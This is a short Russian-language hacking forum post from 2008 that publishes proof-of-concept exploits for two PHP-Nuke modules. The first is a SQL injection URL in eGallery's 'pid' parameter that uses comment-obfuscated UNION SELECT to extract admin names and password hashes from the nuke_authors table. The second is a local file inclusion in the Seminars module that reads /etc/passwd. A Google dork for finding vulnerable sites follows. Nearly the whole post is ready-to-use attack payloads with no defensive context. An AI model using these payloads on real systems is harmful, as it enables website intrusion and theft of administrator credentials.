06.03.2008, 17:23
|
|
Banned
Регистрация: 19.12.2007
Сообщений: 924
Провел на форуме:
4192567
Репутация:
2145
|
|
PHP-Nuke Module eGallery "pid" Remote SQL Injection
PoC:
Код:
modules.php?name=eGallery&file=index&op=showpic&pi
d=-
9999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/0,
aid,pwd,pwd,4/**/from+nuke_authors/*where%20admin%201%200%202
PHP-Nuke Module "seminar" Local FIle Inclusion
PoC:
Код:
modules.php?name=Seminars&op=showSpeech&fileName=../../../../../../../..
/etc/passwd
Google dork:
Код:
inurl:"modules.php?name=seminar"
Regards,
The-0utl4w
Последний раз редактировалось iddqd; 06.03.2008 в 18:57..
|
|
|